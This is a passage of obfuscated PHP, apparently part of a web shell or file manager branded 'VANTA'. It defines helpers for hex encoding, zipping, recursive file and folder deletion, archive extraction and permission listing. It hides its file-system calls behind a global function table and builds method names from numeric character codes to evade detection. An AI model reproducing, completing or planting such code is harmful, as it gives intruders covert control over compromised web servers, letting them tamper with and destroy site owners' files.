vanta_PR1V($n){ $y = ''; for ($i = 0; $i< strlen($n); $i++) { $y .= dechex(ord($n[$i])); } return $y;} function unx($y){ $n = ''; for ($i = 0; $i< strlen($y) - 1; $i += 2) { $n .= chr(hexdec($y[$i] . $y[$i + 1])); } return $n;} function compressToZip($sourceFile, $zipFilename){ $zip = new ZipArchive(); if ($zip->open($zipFilename, ZipArchive::CREATE) === TRUE) { $zip->addFile($sourceFile, basename($sourceFile)); $zip->close(); success(); } else { failed(); } } function r3mvx($val) { $tex = str_replace("/", "", $val); $tex1 = str_replace(":", "", $tex); $tex2 = str_replace("_", "", $tex1); $tex3 = str_replace(" ", "", $tex2); $tex4 = str_replace(".", "", $tex3); return $tex4; } function unlinkDir($dir) { $d1Xe = array($dir); $files = array(); for ($i = 0;; $i++) { if (isset($d1Xe[$i])) $dir = $d1Xe[$i]; else break; if ($opn = @opendir($dir)) { while ($rd = @readdir($opn)) { if ($rd != "\x2e" && $rd != "\x2e\x2e") { $pth = $dir . "\x2f" . $rd; if ($GLOBALS['VANTAxas'][2]($pth)) { $d1Xe[] = $pth; } else { $files[] = $pth; } } } closedir($opn); } } foreach ($files as $file) { if (!@$GLOBALS['VANTAxas'][24]($file)) { return false; } } $d1Xe = array_reverse($d1Xe); foreach ($d1Xe as $d1x2) { if (!@$GLOBALS['VANTAxas'][25]($d1x2)) { return false; } } return true; } function prvFx1($value) { $n4mX = $value; $ext3F = pathinfo($value, PATHINFO_EXTENSION); if (strlen($n4mX) > 30) { return substr($n4mX, 0, 30) . "\x2e\x2e\x2e"; } else { return $value; } } function xtr4cVANTA($VANTAarch, $VANTAaext) { $zip = new ZipArchive(); $methOpen = chDxzZ('111,112,101,110'); $methExtract = chDxXZ('65787472616374546f'); $methClose = chDxzZ([99,108,111,115,101]); if ($zip->$methOpen($VANTAarch) === TRUE) { $zip->$methExtract($VANTAaext); $zip->$methClose(); return true; } else { return false; } } function p3rms($file){$p3rxa=$GLOBALS['VANTAxas'][6]($file);if(($p3rxa&0xC000)==0xC000){$info='s';}elseif(($p3rxa&0xA000)==0xA000){$info='l';}elseif(($p3rxa&0x8000)==0x8000){$info='-';}elseif(($p3rxa&0x6000)==0x6000){$info='b';}elseif(($p3rxa&0x4000)==0x4000){$info='d';}elseif(($p3rxa&0x2000)==0x2000){$info='c';}elseif(($p3rxa&0x1000)==0x1000){$info='p';}else{$info='u';}$info.=(($p3rxa&0x0100)?'r':'-');$info.=(($p3rxa&0x0080)?'w':'-');$info.=(($p3rxa&0x0040)?(($p3rxa&0x0800)?'s':'x'):(($p3rxa&0x0800)?'S':'-'));$info.=(($p3rxa&0x0020)?'r':'-');$info.=(($p3rxa&0x0010)?'w':'-');$info.=(($p3rxa&0x0008)?(($p3rxa&0x0400)?'s':'x'):(($p3rxa&0x0400)?'S':'-'));$info.=(($p3rxa&0x0004)?'r':'-');$info.=(($p3rxa&0x0002)?'w':'-');$info.=(($p3rxa&0x0001)?(($p3rxa&0x0200)?'t':'x'):(($p3rxa&0x0200)?'T':'-'));return $info;} ?>